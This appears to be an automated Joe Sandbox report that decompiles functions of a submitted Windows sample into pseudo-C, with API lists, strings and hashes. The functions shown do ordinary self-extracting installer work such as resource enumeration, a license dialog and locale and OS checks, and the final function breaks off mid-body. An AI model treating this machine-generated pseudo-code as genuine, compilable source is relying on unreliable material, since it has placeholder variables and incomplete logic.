lega, xrefs: 00AC34AC

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: lega
API String ID: 852535152-245445314
Opcode ID: 87cc6f7dcfd1dc49423c89275c4ba045ceb27eeb318cdafc3546ece01333d216
Instruction ID: 9d1850554190773cd82e9fad23356e1adfabb0168a0f1ff8b230711e2246a616
Opcode Fuzzy Hash: 87cc6f7dcfd1dc49423c89275c4ba045ceb27eeb318cdafc3546ece01333d216
Instruction Fuzzy Hash: A301B532240118ABDF1E9FA5DE0CE7E3A65EB05706F07C118F9568A5A0C7708F42D785

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00AC2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0xac8004; // 0xc32e3ded
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0xac9a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00AC1680(_t65, E00AC17C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00AC65E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00AC1680(_t65, E00AC17C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00AC6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00ac2aac
0x00ac2ab7
0x00ac2abc
0x00ac2abe
0x00ac2ac3
0x00ac2ac6
0x00ac2ac9
0x00ac2ace
0x00ac2ae6
0x00ac2bdc
0x00ac2bdc
0x00ac2be0
0x00000000
0x00000000
0x00ac2af2
0x00ac2afc
0x00ac2b00
0x00ac2b05
0x00ac2b05
0x00ac2b0b
0x00ac2bca
0x00ac2bd1
0x00ac2b11
0x00ac2b18
0x00ac2b26
0x00ac2b99
0x00ac2bc8
0x00000000
0x00000000
0x00ac2b9b
0x00ac2bae
0x00ac2bb3
0x00ac2bb5
0x00ac2bb5
0x00ac2bb8
0x00ac2bb8
0x00ac2bba
0x00ac2bbb
0x00000000
0x00ac2bb8
0x00ac2b28
0x00ac2b2e
0x00ac2b33
0x00ac2b39
0x00ac2b3c
0x00ac2b3c
0x00ac2b3e
0x00ac2b3f
0x00ac2b55
0x00ac2b5d
0x00ac2b64
0x00ac2b64
0x00ac2b7a
0x00ac2b7f
0x00ac2b81
0x00ac2b81
0x00ac2b84
0x00ac2b84
0x00ac2b86
0x00ac2b87
0x00ac2bbf
0x00ac2bc1
0x00ac2bc1
0x00ac2b26
0x00ac2bda
0x00ac2bda
0x00ac2be6
0x00ac2be6
0x00ac2bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00AC2AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00AC2AF2
CharNextA.USER32(?), ref: 00AC2B12
CharUpperA.USER32 ref: 00AC2B1E
CharPrevA.USER32(?,?), ref: 00AC2B55
CharNextA.USER32(?), ref: 00AC2BD4

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 2af977c1b0b24d463dc60e3e718286d7e0c19bf36c8557846c559ebd8acfbc63
Instruction ID: 36bbb8fb39f54a1c6c67f2f4884b02744e9c657f63f9dd633039d9448df436a9
Opcode Fuzzy Hash: 2af977c1b0b24d463dc60e3e718286d7e0c19bf36c8557846c559ebd8acfbc63
Instruction Fuzzy Hash: F24103346082495EDB159F348C54FFE7BA99F56304F1A419EE8C287202DB358E87CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00AC43D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00AC43D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0xac8004; // 0xc32e3ded
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00AC6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x00ac43d0
0x00ac43d8
0x00ac43df
0x00ac43e6
0x00ac43ec
0x00ac43f1
0x00ac4400
0x00ac4403
0x00ac440b
0x00ac4420
0x00ac4429
0x00ac4437
0x00ac4444
0x00ac4447
0x00ac444d
0x00ac4454
0x00ac445b
0x00ac4460
0x00ac4461
0x00ac4467
0x00ac446f
0x00ac4473
0x00ac4473
0x00ac4463
0x00ac4463
0x00ac4463
0x00ac447a
0x00ac4481
0x00ac4484
0x00ac448a
0x00ac4492
0x00ac4496
0x00ac4496
0x00ac4486
0x00ac4486
0x00ac4486
0x00ac44b8

APIs

GetWindowRect.USER32(?,?), ref: 00AC43F1
GetWindowRect.USER32(00000000,?), ref: 00AC440B
GetDC.USER32(?), ref: 00AC4423
GetDeviceCaps.GDI32(00000000,00000008), ref: 00AC442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00AC443A
ReleaseDC.USER32(?,00000000), ref: 00AC4447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00AC44A2

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: fbfc46b2293117097bd024fa3da409b779f473e050d6ac9f40349840029da428
Instruction ID: c4692d390c76c751b3012fe8eb5c8201d5b77240b012d9943e06df53b2ee0102
Opcode Fuzzy Hash: fbfc46b2293117097bd024fa3da409b779f473e050d6ac9f40349840029da428
Instruction Fuzzy Hash: B9311E72E00119AFCB14CFF8DD49DEEBBB5EB99314F164269E805B3250DA306D058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00AC6298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00AC6298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0xac8004; // 0xc32e3ded
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E00AC171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0xac9124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0xaca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E00AC171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00AC6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00ac6298
0x00ac62a0
0x00ac62a7
0x00ac62ad
0x00ac62af
0x00ac62bb
0x00ac62c3
0x00ac62c4
0x00ac633b
0x00ac633b
0x00ac6345
0x00ac634d
0x00000000
0x00000000
0x00ac62da
0x00ac62de
0x00ac635f
0x00ac6369
0x00ac62e0
0x00ac62e0
0x00ac62e0
0x00ac62e3
0x00ac62e5
0x00ac62e5
0x00ac62e8
0x00ac62e8
0x00ac62ea
0x00ac62eb
0x00ac62ef
0x00ac62f1
0x00ac62f3
0x00ac6302
0x00ac6308
0x00ac630d
0x00ac6314
0x00ac6314
0x00ac6316
0x00ac6319
0x00ac6355
0x00ac6357
0x00ac631b
0x00ac631b
0x00ac6331
0x00ac6334
0x00ac6339
0x00000000
0x00ac6339
0x00ac6319
0x00ac636b
0x00ac637d
0x00ac637d
0x00000000

APIs

Part of subcall function 00AC171E: _vsnprintf.MSVCRT ref: 00AC1750

LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC62CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC62D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00AC6345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00AC51CA,00000004,00000024,00AC2F71,?,00000002,00000000), ref: 00AC6357

Strings

UPDFILE%lu, xrefs: 00AC62B3, 00AC6329

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 57489fa665cdb024fb43770649b289f3052c37f8524e9518c2e75f30d7ee4336
Instruction ID: c61e657d7384c015b86c8bddbef0d86b745c5c31917cc855acd17afdfc955f2b
Opcode Fuzzy Hash: 57489fa665cdb024fb43770649b289f3052c37f8524e9518c2e75f30d7ee4336
Instruction Fuzzy Hash: 4A21D375A00219ABDB10DFA49C49EFFBB78FB49714B16022DF902A7241DB359D068BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC681F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00AC681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0xac8004; // 0xc32e3ded
				_v8 = _t19 ^ _t44;
				_t41 =  *0xac81d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0xac81d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0xac81d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0xac1140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E00AC66F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0xac81d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				return E00AC6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
			}

0x00ac681f
0x00ac682a
0x00ac6831
0x00ac6836
0x00ac683c
0x00ac683e
0x00ac6848
0x00ac6851
0x00ac685d
0x00ac6864
0x00ac6876
0x00ac693a
0x00ac693a
0x00ac687c
0x00ac687e
0x00ac6885
0x00000000
0x00ac68d6
0x00ac68f4
0x00ac6900
0x00ac6902
0x00ac690a
0x00000000
0x00ac690c
0x00ac690c
0x00ac691c
0x00000000
0x00ac691e
0x00ac6924
0x00ac692b
0x00ac6932
0x00000000
0x00000000
0x00000000
0x00ac692b
0x00ac691c
0x00ac690a
0x00ac6885
0x00ac6876
0x00ac6951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00AC686E
GetSystemMetrics.USER32(0000004A), ref: 00AC68A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00AC68CC
RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,?,0000000C), ref: 00AC68F4
RegCloseKey.ADVAPI32(?), ref: 00AC6902

Part of subcall function 00AC66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00AC691A), ref: 00AC6741

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00AC68C2

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 15ee05a6cafd1461cb9e2c14b74a39f22679d3a2d143f9efef7a7b80d324b75d
Instruction ID: 9d664d49bd547c5bec7e1aece225848cbc2ce28d373da90791189ef392374748
Opcode Fuzzy Hash: 15ee05a6cafd1461cb9e2c14b74a39f22679d3a2d143f9efef7a7b80d324b75d
Instruction Fuzzy Hash: 92317331A00228DFDB31CB55CC45FAAB7B8FB45768F0601A9E94DA6240DB349E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AC3A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E00AC468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0xac8d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E00AC468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0xac8d4c, "<None>") == 0) {
							LocalFree( *0xac8d4c);
							L9:
							 *0xac9124 = 0;
							return 1;
						}
						_t9 = E00AC6517(_t19, 0x7d1, 0, E00AC3100, 0, 0);
						LocalFree( *0xac8d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0xac9124 = 0x800704c7;
						L2:
						return 0;
					}
					E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0xac8d4c);
					 *0xac9124 = 0x80070714;
					goto L2;
				}
				E00AC44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0xac9124 = E00AC6285();
				goto L2;
			}

0x00ac3a46
0x00ac3a57
0x00ac3a5d
0x00ac3a63
0x00ac3a6a
0x00ac3a91
0x00ac3a9a
0x00ac3ad8
0x00ac3b13
0x00ac3b19
0x00ac3b1b
0x00000000
0x00ac3b21
0x00ac3ae7
0x00ac3af4
0x00ac3afc
0x00000000
0x00000000
0x00ac3afe
0x00ac3a87
0x00000000
0x00ac3a87
0x00ac3aa8
0x00ac3ab3
0x00ac3ab9
0x00000000
0x00ac3ab9
0x00ac3a78
0x00ac3a82
0x00000000

APIs

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00AC2F64,?,00000002,00000000), ref: 00AC3A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00AC3AB3

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Part of subcall function 00AC6285: GetLastError.KERNEL32(00AC5BBC), ref: 00AC6285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00AC3AD0
LocalFree.KERNEL32 ref: 00AC3B13

Part of subcall function 00AC6517: FindResourceA.KERNEL32(00AC0000,000007D6,00000005), ref: 00AC652A
Part of subcall function 00AC6517: LoadResource.KERNEL32(00AC0000,00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00AC6538
Part of subcall function 00AC6517: DialogBoxIndirectParamA.USER32(00AC0000,00000000,00000547,00AC19E0,00000000), ref: 00AC6557
Part of subcall function 00AC6517: FreeResource.KERNEL32(00000000,?,?,00AC2EE8,00000000,00AC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00AC6560

LocalFree.KERNEL32(00000000,00AC3100,00000000,00000000), ref: 00AC3AF4

Strings

LICENSE, xrefs: 00AC3A46
<None>, xrefs: 00AC3AC5

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: 32f492f5f2ced65c419fdc2d94392c1668d0bc8107368cb3dc0c06fc2dc74ec9
Instruction ID: 23547676db1dcb82261528a1d48553229376a1d928e1def5ec6de90b06ae0659
Opcode Fuzzy Hash: 32f492f5f2ced65c419fdc2d94392c1668d0bc8107368cb3dc0c06fc2dc74ec9
Instruction Fuzzy Hash: F611DA723002016BDB25DFB2AD09F2739F9EBD9B40B17852EB542D51A1DF7E8C128725

Uniqueness

Uniqueness Score: -1.00%

Function 00AC24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00AC24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0xac8004; // 0xc32e3ded
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E00AC658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00AC6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x00ac24e0
0x00ac24eb
0x00ac24f2
0x00ac24f7
0x00ac2504
0x00ac250e
0x00ac251d
0x00ac252c
0x00ac2541
0x00ac2546
0x00ac2553
0x00ac2555
0x00ac2555
0x00ac2546
0x00ac256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00AC2506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00AC252C
_lopen.KERNEL32(?,00000040), ref: 00AC253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 00AC254C
_lclose.KERNEL32(00000000), ref: 00AC2555

Strings

wininit.ini, xrefs: 00AC2510

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: 2b4bb8c2a536db95d6f8a455554e81294ac8fb96d2fc2225ed8195f68577f1ea
Instruction ID: 5e4c2fb3b6782bf1d7a15ea11c47e60bac4e4400c1cff8d772422e89ba0ac080
Opcode Fuzzy Hash: 2b4bb8c2a536db95d6f8a455554e81294ac8fb96d2fc2225ed8195f68577f1ea
Instruction Fuzzy Hash: 5C019236A0011C67C720DBA59C08EEBBBBCEB55794F020169FA49D3190DA748E468A91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00AC36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0xac8004; // 0xc32e3ded
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0xac8184 = 1;
						 *0xac8180 = 1;
						L13:
						 *0xac9a40 = _t119;
						L14:
						__eflags =  *0xac8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
